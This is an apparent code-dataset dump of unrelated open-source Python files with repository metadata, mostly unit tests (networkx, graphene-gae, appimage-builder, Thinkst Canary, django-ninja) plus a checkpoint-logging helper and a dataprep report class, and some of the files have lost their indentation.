G = nx.DiGraph()
G.add_edge(0, 1)
G.add_edge(1, 2)
G.add_edge(2, 3)
label_name = 'label'
G.node[0][label_name] = 'A'
G.node[3][label_name] = 'B'
        node_classification.local_and_global_consistency(G)
def test_one_labeled_node(self):
G = nx.path_graph(4)
label_name = 'label'
G.node[0][label_name] = 'A'
predicted = node_classification.local_and_global_consistency(
G, label_name=label_name)
assert_equal(predicted[0], 'A')
assert_equal(predicted[1], 'A')
assert_equal(predicted[2], 'A')
assert_equal(predicted[3], 'A')
def test_nodes_all_labeled(self):
G = nx.karate_club_graph()
label_name = 'club'
predicted = node_classification.local_and_global_consistency(
G, alpha=0, label_name=label_name)
for i in range(len(G)):
assert_equal(predicted[i], G.node[i][label_name])
|
0a210efb97922df88c2802eb997b66ac6156118d
|
3358a23ed0b97eaca6035778feecb74a97f24d0b
|
/tests/_ndb/test_converter.py
|
026a1f7cb80a3a982a0aaa6758bd28a15e2a816c
|
[
"BSD-3-Clause"
] |
permissive
|
graphql-python/graphene-gae
|
18707958469bccc9e74b1807b3bcd9a7662c490c
|
7cf364eddb6d5b76575f5e80fb97a588c92634a1
|
refs/heads/master
| 2022-09-23T16:19:00.243204
| 2022-09-06T11:33:23
| 2022-09-06T11:33:23
| 58,579,572
| 128
| 15
|
BSD-3-Clause
| 2021-03-25T21:28:06
| 2016-05-11T20:41:37
|
Python
|
UTF-8
|
Python
| false
| false
| 8,128
|
py
|
test_converter.py
|
import mock
from graphene_gae.ndb.types import NdbObjectType
from tests.base_test import BaseTest
from google.appengine.ext import ndb
import graphene
from graphene import List, NonNull, String
from graphene.types.json import JSONString
from graphene.types.datetime import DateTime, Time
from graphene_gae.ndb.fields import NdbKeyStringField, NdbKeyReferenceField, DynamicNdbKeyStringField, DynamicNdbKeyReferenceField
from graphene_gae.ndb.converter import convert_ndb_property
from graphene_gae.ndb.registry import Registry
__author__ = 'ekampf'
class SomeWeirdUnknownProperty(ndb.Property):
pass
class TestNDBConverter(BaseTest):
def __assert_conversion(self, ndb_property_type, expected_graphene_type, *args, **kwargs):
ndb_property = ndb_property_type(*args, **kwargs)
result = convert_ndb_property(ndb_property)
graphene_field = result.field
self.assertEqual(graphene_field._type, expected_graphene_type)
def testUnknownProperty_raisesException(self):
with self.assertRaises(Exception) as context:
prop = SomeWeirdUnknownProperty()
prop._code_name = "my_prop"
convert_ndb_property(prop)
self.assertTrue("Don't know how to convert" in context.exception.message, msg=context.exception.message)
@mock.patch('graphene_gae.ndb.converter.converters')
def testNoneResult_raisesException(self, patch_convert):
from graphene_gae.ndb.converter import convert_ndb_property
patch_convert.get.return_value = lambda *_: None
with self.assertRaises(Exception) as context:
prop = ndb.StringProperty()
prop._code_name = "my_prop"
convert_ndb_property(prop)
        # "propeerty" is spelled as in the message raised by the converter
        expected_message = 'Failed to convert NDB propeerty to a GraphQL field my_prop (StringProperty())'
self.assertTrue(expected_message in context.exception.message, msg=context.exception.message)
def testStringProperty_shouldConvertToString(self):
self.__assert_conversion(ndb.StringProperty, graphene.String)
def testStringProperty_repeated_shouldConvertToList(self):
ndb_prop = ndb.StringProperty(repeated=True)
result = convert_ndb_property(ndb_prop)
graphene_type = result.field._type
self.assertIsInstance(graphene_type, graphene.List)
self.assertEqual(graphene_type.of_type, graphene.String)
    def testStringProperty_required_shouldConvertToNonNull(self):
        ndb_prop = ndb.StringProperty(required=True)
        result = convert_ndb_property(ndb_prop)
        graphene_type = result.field._type
        self.assertIsInstance(graphene_type, graphene.NonNull)
        self.assertEqual(graphene_type.of_type, graphene.String)
    def testTextProperty_shouldConvertToString(self):
        self.__assert_conversion(ndb.TextProperty, graphene.String)
    def testBoolProperty_shouldConvertToBoolean(self):
        self.__assert_conversion(ndb.BooleanProperty, graphene.Boolean)
    def testIntProperty_shouldConvertToInt(self):
        self.__assert_conversion(ndb.IntegerProperty, graphene.Int)
    def testFloatProperty_shouldConvertToFloat(self):
        self.__assert_conversion(ndb.FloatProperty, graphene.Float)
    def testDateProperty_shouldConvertToDateTime(self):
        self.__assert_conversion(ndb.DateProperty, DateTime)
    def testDateTimeProperty_shouldConvertToDateTime(self):
        self.__assert_conversion(ndb.DateTimeProperty, DateTime)
    def testTimeProperty_shouldConvertToTime(self):
        self.__assert_conversion(ndb.TimeProperty, Time)
    def testJsonProperty_shouldConvertToJSONString(self):
        self.__assert_conversion(ndb.JsonProperty, JSONString)
def testKeyProperty_withSuffix(self):
my_registry = Registry()
class User(ndb.Model):
name = ndb.StringProperty()
class UserType(NdbObjectType):
class Meta:
model = User
registry = my_registry
prop = ndb.KeyProperty(kind='User')
prop._code_name = 'user_key'
conversion = convert_ndb_property(prop, my_registry)
self.assertLength(conversion, 2)
self.assertEqual(conversion[0].name, 'user_id')
self.assertIsInstance(conversion[0].field, DynamicNdbKeyStringField)
_type = conversion[0].field.get_type()
self.assertIsInstance(_type, NdbKeyStringField)
self.assertEqual(_type._type, String)
self.assertEqual(conversion[1].name, 'user')
self.assertIsInstance(conversion[1].field, DynamicNdbKeyReferenceField)
_type = conversion[1].field.get_type()
self.assertIsInstance(_type, NdbKeyReferenceField)
self.assertEqual(_type._type, UserType)
def testKeyProperty_withSuffix_repeated(self):
my_registry = Registry()
class User(ndb.Model):
name = ndb.StringProperty()
class UserType(NdbObjectType):
class Meta:
model = User
registry = my_registry
prop = ndb.KeyProperty(kind='User', repeated=True)
prop._code_name = 'user_keys'
conversion = convert_ndb_property(prop, my_registry)
self.assertLength(conversion, 2)
self.assertEqual(conversion[0].name, 'user_ids')
self.assertIsInstance(conversion[0].field, DynamicNdbKeyStringField)
_type = conversion[0].field.get_type()
self.assertIsInstance(_type, NdbKeyStringField)
self.assertIsInstance(_type._type, List)
self.assertEqual(_type._type.of_type, String)
self.assertEqual(conversion[1].name, 'users')
self.assertIsInstance(conversion[1].field, DynamicNdbKeyReferenceField)
_type = conversion[1].field.get_type()
self.assertIsInstance(_type, NdbKeyReferenceField)
self.assertIsInstance(_type._type, List)
self.assertEqual(_type._type.of_type, UserType)
def testKeyProperty_withSuffix_required(self):
class User(ndb.Model):
name = ndb.StringProperty()
my_registry = Registry()
class UserType(NdbObjectType):
class Meta:
model = User
registry = my_registry
prop = ndb.KeyProperty(kind='User', required=True)
prop._code_name = 'user_key'
conversion = convert_ndb_property(prop, my_registry)
self.assertLength(conversion, 2)
self.assertEqual(conversion[0].name, 'user_id')
self.assertIsInstance(conversion[0].field, DynamicNdbKeyStringField)
_type = conversion[0].field.get_type()
self.assertIsInstance(_type, NdbKeyStringField)
self.assertIsInstance(_type._type, NonNull)
self.assertEqual(_type._type.of_type, String)
self.assertEqual(conversion[1].name, 'user')
self.assertIsInstance(conversion[1].field, DynamicNdbKeyReferenceField)
_type = conversion[1].field.get_type()
self.assertIsInstance(_type, NdbKeyReferenceField)
self.assertIsInstance(_type._type, NonNull)
self.assertEqual(_type._type.of_type, UserType)
def testKeyProperty_withoutSuffix(self):
my_registry = Registry()
class User(ndb.Model):
name = ndb.StringProperty()
class UserType(NdbObjectType):
class Meta:
model = User
registry = my_registry
prop = ndb.KeyProperty(kind='User')
prop._code_name = 'user'
conversion = convert_ndb_property(prop, my_registry)
self.assertLength(conversion, 2)
self.assertEqual(conversion[0].name, 'user_id')
self.assertIsInstance(conversion[0].field, DynamicNdbKeyStringField)
_type = conversion[0].field.get_type()
self.assertIsInstance(_type, NdbKeyStringField)
self.assertEqual(_type._type, String)
self.assertEqual(conversion[1].name, 'user')
self.assertIsInstance(conversion[1].field, DynamicNdbKeyReferenceField)
_type = conversion[1].field.get_type()
self.assertIsInstance(_type, NdbKeyReferenceField)
self.assertEqual(_type._type, UserType)
|
8c20dc23c451a7f655ed1f339a592e984fd63f96
|
d066f7fe739fb78f74ec2de8ccbfefdd4270f60f
|
/tests/commands/run_script.py
|
0150578623e38b6fa246882cfac2f3940e7720fd
|
[
"MIT"
] |
permissive
|
AppImageCrafters/appimage-builder
|
666e75363a74f615cdb3673b3ca9d51a6d292a49
|
f38699ef3644fa5409a5a262b7b6d99d6fb85db9
|
refs/heads/main
| 2023-08-17T06:34:54.029664
| 2023-06-03T17:51:04
| 2023-06-03T17:51:04
| 218,847,680
| 270
| 54
|
MIT
| 2023-09-06T17:04:18
| 2019-10-31T19:44:17
|
Python
|
UTF-8
|
Python
| false
| false
| 2,851
|
py
|
run_script.py
|
import pathlib
import unittest
import roam
from appimagebuilder.commands import RunScriptCommand
from appimagebuilder.context import Context
class RunScriptCommandTestCase(unittest.TestCase):
def setUp(self) -> None:
super().setUp()
self.fake_context = Context(
recipe_path=pathlib.Path("/tmp/non_existent/AppImageBuilder.yml"),
build_dir=pathlib.Path("/tmp/"),
app_dir=pathlib.Path("/tmp/AppDir"),
app_info=None,
bundle_info=None,
)
def test_set_env(self):
script = roam.Roamer(
[
"export var=1",
"if [ -z ${var+x} ]; then",
" exit 1; ",
"fi",
]
)
command = RunScriptCommand(self.fake_context, script)
command()
def test_run_exit_1(self):
script = roam.Roamer(["exit 1"])
command = RunScriptCommand(self.fake_context, script)
self.assertRaises(RuntimeError, command)
def test_use_pass_env(self):
script = roam.Roamer(
[
"if [ -z ${var+x} ]; then",
" exit 1; ",
"fi",
]
)
command = RunScriptCommand(self.fake_context, script, env={"var": "value"})
command()
def test_builder_env_set(self):
script = roam.Roamer(
[
"echo $BUILDER_ENV",
"if [ -z ${BUILDER_ENV+x} ]; then",
" exit 1; ",
"fi",
]
)
cmd = RunScriptCommand(self.fake_context, script)
cmd()
def test_builder_export_variable(self):
script_1 = roam.Roamer(["echo TEST_VAR=1 >> $BUILDER_ENV"])
script_2 = roam.Roamer(
[
"if [ -z ${TEST_VAR+x} ]; then",
" exit 1; ",
"fi",
]
)
cmd1 = RunScriptCommand(self.fake_context, script_1)
cmd1()
cmd2 = RunScriptCommand(self.fake_context, script_2)
cmd2()
def test_target_appdir_env_set(self):
s = roam.Roamer(['[[ ! -z "$TARGET_APPDIR" ]] && echo $TARGET_APPDIR'])
cmd1 = RunScriptCommand(self.fake_context, s)
cmd1()
def test_recipe_env_set(self):
s = roam.Roamer(['[[ ! -z "$RECIPE" ]] && echo $RECIPE'])
cmd1 = RunScriptCommand(self.fake_context, s)
cmd1()
def test_build_dir_env_set(self):
s = roam.Roamer(['[[ ! -z "$BUILD_DIR" ]] && echo $BUILD_DIR'])
cmd1 = RunScriptCommand(self.fake_context, s)
cmd1()
def test_source_dir_env_set(self):
s = roam.Roamer(['[[ ! -z "$SOURCE_DIR" ]] && echo $SOURCE_DIR'])
cmd1 = RunScriptCommand(self.fake_context, s)
cmd1()
if __name__ == "__main__":
unittest.main()
|
078d748fafebef0b18fcbaed21769c049f1c184a
|
9784a90cac667e8e0aaba0ca599b4255b215ec67
|
/common/train_log_param_saver.py
|
e2e1e7af52f11a56922d906c3cdf058b6f1dd3d1
|
[
"MIT"
] |
permissive
|
osmr/imgclsmob
|
d2f48f01ca541b20119871393eca383001a96019
|
f2993d3ce73a2f7ddba05da3891defb08547d504
|
refs/heads/master
| 2022-07-09T14:24:37.591824
| 2021-12-14T10:15:31
| 2021-12-14T10:15:31
| 140,285,687
| 3,017
| 624
|
MIT
| 2022-07-04T15:18:37
| 2018-07-09T12:57:46
|
Python
|
UTF-8
|
Python
| false
| false
| 11,279
|
py
|
train_log_param_saver.py
|
import os
import shutil
class TrainLogParamSaver(object):
"""
    Train logger that does the following:
    1. saves several of the most recent model checkpoints, for disaster recovery,
    2. saves several of the best model checkpoints, to guard against overfitting,
    3. appends raw evaluation metric values to a log file for monitoring.
Parameters:
----------
checkpoint_file_name_prefix : str
prefix for checkpoint file name (without parent dir)
last_checkpoint_file_name_suffix : str or None
suffix for last checkpoint file name
if None then checkpoint_file_name_prefix is not modified
best_checkpoint_file_name_suffix : str or None
suffix for best checkpoint file name
last_checkpoint_dir_path : str
directory path for saving the last checkpoint files
best_checkpoint_dir_path : str or None
directory name for saving the best checkpoint files
if None then best_checkpoint_dir_path = last_checkpoint_dir_path
last_checkpoint_file_count : int
count of the last checkpoint files
best_checkpoint_file_count : int
count of the best checkpoint files
checkpoint_file_save_callback : function or None
Callback for real saving of checkpoint file
checkpoint_file_exts : tuple of str
List of checkpoint file extensions
save_interval : int
Interval of checkpoint file saving
num_epochs : int
Number of epochs for saving last checkpoint if save_interval > 1
    bigger : list of bool
        whether a bigger value is better, for each evaluation metric
    mask : list of bool or None
        which evaluation metric values should be taken into account
score_log_file_path : str or None
file path to score log file
score_log_attempt_value : int
number of current attempt (used for comparing training curves for various hyperparameters)
best_map_log_file_path : str or None
file path to best map log file
"""
def __init__(self,
checkpoint_file_name_prefix="model",
last_checkpoint_file_name_suffix="last",
best_checkpoint_file_name_suffix=None,
last_checkpoint_dir_path="",
best_checkpoint_dir_path=None,
last_checkpoint_file_count=2,
best_checkpoint_file_count=2,
checkpoint_file_save_callback=None,
checkpoint_file_exts=(".params",),
save_interval=1,
num_epochs=-1,
param_names=None,
acc_ind=0,
# bigger=[True],
# mask=None,
score_log_file_path=None,
score_log_attempt_value=1,
best_map_log_file_path=None):
if not os.path.exists(last_checkpoint_dir_path):
os.makedirs(last_checkpoint_dir_path)
if best_checkpoint_dir_path is None:
best_checkpoint_dir_path = last_checkpoint_dir_path
assert ((last_checkpoint_file_name_suffix != best_checkpoint_file_name_suffix) and
(not ((last_checkpoint_file_name_suffix is None) and
(best_checkpoint_file_name_suffix is None))))
else:
assert (last_checkpoint_dir_path != best_checkpoint_dir_path)
if not os.path.exists(best_checkpoint_dir_path):
os.makedirs(best_checkpoint_dir_path)
self.last_checkpoints_prefix = self._create_checkpoint_file_path_full_prefix(
checkpoint_dir_path=last_checkpoint_dir_path,
checkpoint_file_name_prefix=checkpoint_file_name_prefix,
checkpoint_file_name_suffix=last_checkpoint_file_name_suffix)
self.best_checkpoints_prefix = self._create_checkpoint_file_path_full_prefix(
checkpoint_dir_path=best_checkpoint_dir_path,
checkpoint_file_name_prefix=checkpoint_file_name_prefix,
checkpoint_file_name_suffix=best_checkpoint_file_name_suffix)
assert (last_checkpoint_file_count >= 0)
self.last_checkpoint_file_count = last_checkpoint_file_count
assert (best_checkpoint_file_count >= 0)
self.best_checkpoint_file_count = best_checkpoint_file_count
self.checkpoint_file_save_callback = checkpoint_file_save_callback
self.checkpoint_file_exts = checkpoint_file_exts
assert (save_interval > 0)
self.save_interval = save_interval
assert (num_epochs > 0)
self.num_epochs = num_epochs
        assert isinstance(param_names, list)
self.param_names = param_names
assert (acc_ind >= 0) and (acc_ind < len(param_names))
self.acc_ind = acc_ind
# assert isinstance(bigger, list)
# self.bigger = np.array(bigger)
# if mask is None:
# self.mask = np.ones_like(self.bigger)
# else:
# assert isinstance(mask, list)
# assert (len(mask) == len(bigger))
# self.mask = np.array(mask)
if score_log_file_path is not None:
self.score_log_file_exist = (os.path.exists(score_log_file_path) and
os.path.getsize(score_log_file_path) > 0)
self.score_log_file = open(score_log_file_path, "a")
if not self.score_log_file_exist:
titles = ["Attempt", "Epoch"] + self.param_names
self.score_log_file.write("\t".join(titles))
self.score_log_file.flush()
else:
self.score_log_file = None
self.score_log_attempt_value = score_log_attempt_value
if best_map_log_file_path is not None:
self.best_map_log_file_exist = (os.path.exists(best_map_log_file_path) and
os.path.getsize(best_map_log_file_path) > 0)
self.best_map_log_file = open(best_map_log_file_path, "a")
if not self.best_map_log_file_exist:
titles = ["Attempt", "Epoch", self.param_names[self.acc_ind]]
self.best_map_log_file.write("\t".join(titles))
self.best_map_log_file.flush()
else:
self.best_map_log_file = None
self.best_eval_metric_value = None
self.best_eval_metric_epoch = None
self.last_checkpoint_params_file_stems = []
self.best_checkpoint_params_file_stems = []
self.can_save = (self.checkpoint_file_save_callback is not None)
def __del__(self):
"""
Releasing resources.
"""
if self.score_log_file is not None:
self.score_log_file.close()
if self.best_map_log_file is not None:
self.best_map_log_file.close()
def epoch_test_end_callback(self,
epoch1,
params,
**kwargs):
curr_acc = params[self.acc_ind]
if self.can_save:
last_checkpoint_params_file_stem = None
if (epoch1 % self.save_interval == 0) or (epoch1 == self.num_epochs):
last_checkpoint_params_file_stem = self._get_last_checkpoint_params_file_stem(epoch1, curr_acc)
self.checkpoint_file_save_callback(last_checkpoint_params_file_stem, **kwargs)
self.last_checkpoint_params_file_stems.append(last_checkpoint_params_file_stem)
if len(self.last_checkpoint_params_file_stems) > self.last_checkpoint_file_count:
removed_checkpoint_file_stem = self.last_checkpoint_params_file_stems[0]
for ext in self.checkpoint_file_exts:
removed_checkpoint_file_path = removed_checkpoint_file_stem + ext
if os.path.exists(removed_checkpoint_file_path):
os.remove(removed_checkpoint_file_path)
del self.last_checkpoint_params_file_stems[0]
if (self.best_eval_metric_value is None) or (curr_acc < self.best_eval_metric_value):
self.best_eval_metric_value = curr_acc
self.best_eval_metric_epoch = epoch1
best_checkpoint_params_file_stem = self._get_best_checkpoint_params_file_stem(epoch1, curr_acc)
if last_checkpoint_params_file_stem is not None:
for ext in self.checkpoint_file_exts:
last_checkpoint_params_file_path = last_checkpoint_params_file_stem + ext
best_checkpoint_params_file_path = best_checkpoint_params_file_stem + ext
assert (os.path.exists(last_checkpoint_params_file_path))
shutil.copy(
src=last_checkpoint_params_file_path,
dst=best_checkpoint_params_file_path)
else:
self.checkpoint_file_save_callback(best_checkpoint_params_file_stem, **kwargs)
self.best_checkpoint_params_file_stems.append(best_checkpoint_params_file_stem)
if len(self.best_checkpoint_params_file_stems) > self.best_checkpoint_file_count:
removed_checkpoint_file_stem = self.best_checkpoint_params_file_stems[0]
for ext in self.checkpoint_file_exts:
removed_checkpoint_file_path = removed_checkpoint_file_stem + ext
if os.path.exists(removed_checkpoint_file_path):
os.remove(removed_checkpoint_file_path)
del self.best_checkpoint_params_file_stems[0]
if self.best_map_log_file is not None:
self.best_map_log_file.write('\n{:02d}\t{:04d}\t{:.4f}'.format(
self.score_log_attempt_value, epoch1, curr_acc))
self.best_map_log_file.flush()
if self.score_log_file is not None:
score_log_file_row = "\n" + "\t".join([str(self.score_log_attempt_value), str(epoch1)] +
list(map(lambda x: "{:.4f}".format(x), params)))
self.score_log_file.write(score_log_file_row)
self.score_log_file.flush()
@staticmethod
def _create_checkpoint_file_path_full_prefix(checkpoint_dir_path,
checkpoint_file_name_prefix,
checkpoint_file_name_suffix):
checkpoint_file_name_full_prefix = checkpoint_file_name_prefix
if checkpoint_file_name_suffix is not None:
checkpoint_file_name_full_prefix += ("_" + checkpoint_file_name_suffix)
return os.path.join(
checkpoint_dir_path,
checkpoint_file_name_full_prefix)
@staticmethod
def _get_checkpoint_params_file_stem(checkpoint_file_path_prefix, epoch, acc):
return "{}_{:04d}_{:.4f}".format(checkpoint_file_path_prefix, epoch, acc)
def _get_last_checkpoint_params_file_stem(self, epoch, acc):
return self._get_checkpoint_params_file_stem(self.last_checkpoints_prefix, epoch, acc)
def _get_best_checkpoint_params_file_stem(self, epoch, acc):
return self._get_checkpoint_params_file_stem(self.best_checkpoints_prefix, epoch, acc)
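# A minimal usage sketch of TrainLogParamSaver, guarded so it only runs when
# this module is executed directly. The save callback, directory, and file
# names below are hypothetical stand-ins; a real training loop would pass its
# framework's checkpoint-saving function instead.
if __name__ == "__main__":
    def _demo_save(file_stem):
        # stand-in for a real checkpoint writer: just touch the file
        open(file_stem + ".params", "w").close()

    saver = TrainLogParamSaver(
        checkpoint_file_name_prefix="model",
        last_checkpoint_dir_path="demo_checkpoints",
        checkpoint_file_save_callback=_demo_save,
        num_epochs=3,
        param_names=["Val.Err"],
        acc_ind=0,
        score_log_file_path="demo_checkpoints/score.log")
    # a lower value is treated as better (see the `curr_acc < best` comparison
    # above), so epoch 2 below becomes the best checkpoint
    for epoch1, err in enumerate([0.50, 0.42, 0.45], start=1):
        saver.epoch_test_end_callback(epoch1, params=[err])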
|
bbfbf5984847fc4bebdb65b481274c5c689dd860
|
2a1b8a671aceda6bc446f8ce26400aa84fa444a6
|
/Packs/ThinkstCanary/Integrations/ThinkstCanary/ThinkstCanary_test.py
|
6a1d933db4e7f9083695250f85f6c31a680273df
|
[
"MIT"
] |
permissive
|
demisto/content
|
6d4722d46f0ff0beea2748e9f7de585bf91a78b4
|
890def5a0e0ae8d6eaa538148249ddbc851dbb6b
|
refs/heads/master
| 2023-09-04T00:02:25.618032
| 2023-09-03T21:56:22
| 2023-09-03T21:56:22
| 60,525,392
| 1,023
| 1,921
|
MIT
| 2023-09-14T20:55:24
| 2016-06-06T12:17:02
|
Python
|
UTF-8
|
Python
| false
| false
| 6,785
|
py
|
ThinkstCanary_test.py
|
import demistomock as demisto
import pytest
MOCK_PARAMS = {
'access-key': 'fake_access_key',
'secret-key': 'fake_access_key',
'server': 'http://123-fake-api.com/',
'unsecure': True,
'proxy': True,
'authentication_token': {'password': 1}
}
def test_fetch_incidents(mocker, requests_mock):
"""
Given: An existing last run time.
When: Running a fetch incidents command normally (not a first run).
Then: The last run time object should increment by 1 second.
    2020-07-01-04:58:18 -> 2020-07-01-04:58:19
"""
mocker.patch.object(demisto, 'params', return_value=MOCK_PARAMS)
mocker.patch.object(demisto, 'getLastRun', return_value={'time': '2020-07-01-04:58:18'})
mocker.patch.object(demisto, 'setLastRun')
requests_mock.get('http://123-fake-api.com/api/v1/incidents/unacknowledged?newer_than=2020-07-01-04%3A58%3A18',
json={'incidents': [{'description': {'created': 1593579498}}]})
from ThinkstCanary import fetch_incidents_command
fetch_incidents_command()
assert demisto.setLastRun.call_args[0][0]['time'] == '2020-07-01-04:58:19'
def test_check_whitelist_command_not_whitelisted(mocker):
"""
Given: An IP to check
When: Running check_whitelist_command.
Then: The IP should not be ignored (not in the whitelist).
"""
ip_to_check = "1.2.3.4"
mocker.patch.object(demisto, 'results')
mocker.patch.object(demisto, 'params', return_value=MOCK_PARAMS)
mocker.patch.object(demisto, 'args', return_value={'ip': ip_to_check})
import ThinkstCanary
mocker.patch.object(ThinkstCanary, 'check_whitelist', return_value={'is_ip_ignored': False,
'is_whitelist_enabled': True})
ThinkstCanary.check_whitelist_command()
assert demisto.results.call_args_list[0][0][0].get('HumanReadable') == 'The IP address 1.2.3.4:Any is not ' \
'Whitelisted'
def test_check_whitelist_commands_whitelisted(mocker):
"""
Given: An already whitelisted IP to check
When: Inserting IP to whitelist (whitelist_ip_command) and checking if it is whitelisted (check_whitelist_command).
Then: The IP should be ignored (in the whitelist), and an appropriate message to the user should be prompted.
"""
ip_to_whitelist = "1.2.3.4"
mocker.patch.object(demisto, 'results')
mocker.patch.object(demisto, 'params', return_value=MOCK_PARAMS)
mocker.patch.object(demisto, 'args', return_value={'ip': ip_to_whitelist})
import ThinkstCanary
mocker.patch.object(ThinkstCanary, 'whitelist_ip', return_value={'message': 'Whitelist added',
'result': 'success'})
mocker.patch.object(ThinkstCanary, 'check_whitelist', return_value={'is_ip_ignored': True,
'is_whitelist_enabled': True})
ThinkstCanary.whitelist_ip_command()
ThinkstCanary.check_whitelist_command()
assert demisto.results.call_args_list[1][0][0].get('HumanReadable') == 'The IP address 1.2.3.4:Any is Whitelisted'
@pytest.mark.parametrize('arg_status, return_status, expected_result',
[('Acknowledge', 'acknowledged', 'The Alert alert_id was acknowledged'),
('Unacknowledge', 'unacknowledged', 'The Alert alert_id was unacknowledged')])
def test_alert_status_command(mocker, arg_status, return_status, expected_result):
"""
Given: An alert id to check.
When: Running alert_status_command.
Then: ensure the expected result returned.
"""
mocker.patch.object(demisto, 'results')
mocker.patch.object(demisto, 'params', return_value=MOCK_PARAMS)
mocker.patch.object(demisto, 'args', return_value={'alert_id': 'alert_id', 'status': arg_status})
import ThinkstCanary
mocker.patch.object(ThinkstCanary, 'http_request', return_value={'action': return_status})
ThinkstCanary.alert_status_command()
assert expected_result in demisto.results.call_args_list[0][0][0].get('HumanReadable')
def test_list_canaries_command(mocker):
"""
Given: demisto params.
When: Running list_canaries_command.
Then: ensure the expected result returned.
"""
mocker.patch.object(demisto, 'results')
mocker.patch.object(demisto, 'params', return_value=MOCK_PARAMS)
import ThinkstCanary
mocker.patch.object(ThinkstCanary, 'http_request', return_value={'devices': [{'description': 'Description',
'id': 'ID',
'ip_address': 'Address',
'last_seen': 'LastSeen',
'live': 'Status',
'location': 'Location',
'name': 'Name',
'updated_std': 'LastUpdated',
'version': 'Version'}]})
ThinkstCanary.list_canaries_command()
assert 'Canary Devices' in demisto.results.call_args_list[0][0][0].get('HumanReadable')
def test_list_tokens_command(mocker):
"""
Given: demisto params.
When: Running list_tokens_command.
Then: ensure the expected result returned.
"""
mocker.patch.object(demisto, 'results')
mocker.patch.object(demisto, 'params', return_value=MOCK_PARAMS)
import ThinkstCanary
mocker.patch.object(ThinkstCanary, 'http_request', return_value={'tokens': [{'canarytoken': 'CanaryToken',
'created_printable': 'CreatedTime',
'enabled': 'Enabled',
'kind': 'Kind',
'triggered_count': 'Triggered',
'doc_name': 'DocName',
'url': 'TokenURL'}]})
ThinkstCanary.list_tokens_command()
assert 'Canary Tools Tokens' in demisto.results.call_args_list[0][0][0].get('HumanReadable')
|
bc8e28d2582e13489cd6c5377a5f0a5d087506de
|
a6c05f5bea011ddce375c4a31e52e04bcb2ee053
|
/dataprep/eda/create_report/report.py
|
457c4499323438791db2b3d31110054ff6648203
|
[
"MIT"
] |
permissive
|
sfu-db/dataprep
|
8db4286f4eccfde9e00b4e4fe4ac7d0fd567d9f1
|
17eda6925b9c37200eae969813ed41583d225989
|
refs/heads/develop
| 2023-08-18T09:01:04.057248
| 2023-05-30T02:39:47
| 2023-08-03T04:05:43
| 186,311,346
| 1,755
| 215
|
MIT
| 2023-08-03T04:05:45
| 2019-05-12T22:37:24
|
Python
|
UTF-8
|
Python
| false
| false
| 3,487
|
py
|
report.py
|
"""
This module implements the Report class.
"""
import sys
import webbrowser
from pathlib import Path
from tempfile import NamedTemporaryFile
from typing import Optional
import os
from ...utils import is_notebook
CELL_HEIGHT_OVERRIDE = """<style>
div.output_scroll {
height: 850px;
}
div.cell-output>div:first-of-type {
max-height: 850px !important;
}
</style>"""
class Report:
"""
This class creates a customized Report object for the create_report function
"""
def __init__(self, report: str) -> None:
self.report = report
def _repr_html_(self) -> str:
"""
Display report inside a notebook
"""
return f"{CELL_HEIGHT_OVERRIDE}<div style='background-color: #fff;'>{self.report}</div>"
def __repr__(self) -> str:
"""
Remove object name
"""
return ""
def save(self, path: Optional[str] = None) -> None:
"""
Save report to current working directory.
Parameters
----------
filename: Optional[str], default 'report'
The filename used for saving report without the extension name.
to: Optional[str], default Path.cwd()
The path to where the report will be saved.
"""
saved_file_path = None
if path:
extension = os.path.splitext(path)[1]
posix_path = Path(path).expanduser()
if posix_path.is_dir():
if path.endswith("/"):
path += "report.html"
else:
path += "/report.html"
elif extension:
if extension != ".html":
                    raise ValueError(
                        f"Format '{extension}' is not supported (supported formats: html)"
                    )
else:
path += ".html"
saved_file_path = Path(path).expanduser()
else:
path = str(Path.cwd()) + "/report.html"
saved_file_path = Path(path).expanduser()
with open(saved_file_path, "w", encoding="utf-8") as file:
file.write(self.report)
print(f"Report has been saved to {saved_file_path}!")
def show_browser(self) -> None:
"""
        Open the report in the browser. This is useful when calling from a terminal.
"""
with NamedTemporaryFile(suffix=".html", delete=False) as tmpf:
pass
with open(tmpf.name, "w", encoding="utf-8") as file:
file.write(self.report)
webbrowser.open(f"file://{tmpf.name}", new=2)
def show(self) -> None:
"""
Render the report. This is useful when calling plot in a for loop.
"""
        # outside a notebook environment the report cannot be rendered inline,
        # so point the user at show_browser instead.
        if not is_notebook():
            print(
                "The report will not render outside a notebook environment; "
                "try 'show_browser' if you want to open it in a browser",
                file=sys.stderr,
            )
try:
from IPython.display import ( # pylint: disable=import-outside-toplevel
HTML,
display,
)
display(HTML(self._repr_html_()))
except ImportError:
pass
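# A minimal usage sketch (the HTML payload below is a hypothetical stand-in
# for the markup produced by create_report), guarded so it only runs when
# this module is executed directly:
if __name__ == "__main__":
    demo = Report("<h1>Demo report</h1><p>hello</p>")
    demo.save("demo_report")   # writes ./demo_report.html
    # demo.show_browser()      # uncomment to open the saved report in a browser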
|
057ac9c480dca2381a9d63bbdb749d4bebc4041f
|
a4913dc468f763ead62218a01ad058c84a17a7b1
|
/tests/test_test_client.py
|
e171aeb3e235196a57384c467b4702a1457ba84f
|
[
"MIT"
] |
permissive
|
vitalik/django-ninja
|
200c922f134ed09cb51957bc134a4a0830d3d8ff
|
8be35e42a9dc2365e764a0fea0a0b868eeae312b
|
refs/heads/master
| 2023-08-31T02:44:05.149087
| 2023-08-28T12:35:04
| 2023-08-28T12:35:04
| 265,194,554
| 5,034
| 340
|
MIT
| 2023-09-14T09:58:40
| 2020-05-19T08:48:53
|
Python
|
UTF-8
|
Python
| false
| false
| 2,694
|
py
|
test_test_client.py
|
from datetime import datetime
from http import HTTPStatus
from unittest import mock
import pytest
from django.utils import timezone
from ninja import Router
from ninja.schema import Schema
from ninja.testing import TestClient
router = Router()
@router.get("/request/build_absolute_uri")
def request_build_absolute_uri(request):
return request.build_absolute_uri()
@router.get("/request/build_absolute_uri/location")
def request_build_absolute_uri_location(request):
return request.build_absolute_uri("location")
@router.get("/test")
def simple_get(request):
return "test"
client = TestClient(router)
@pytest.mark.parametrize(
"path,expected_status,expected_response",
[
("/request/build_absolute_uri", HTTPStatus.OK, "http://testlocation/"),
(
"/request/build_absolute_uri/location",
HTTPStatus.OK,
"http://testlocation/location",
),
],
)
def test_sync_build_absolute_uri(path, expected_status, expected_response):
response = client.get(path)
assert response.status_code == expected_status
assert response.json() == expected_response
@pytest.mark.parametrize(
"version, has_headers",
[
((2, 0), False),
((2, 1), False),
((2, 2), True),
((3, 0), True),
],
)
def test_django_2_2_plus_headers(version, has_headers):
with mock.patch("ninja.testing.client.django", VERSION=version):
with mock.patch.object(client, "_call") as call:
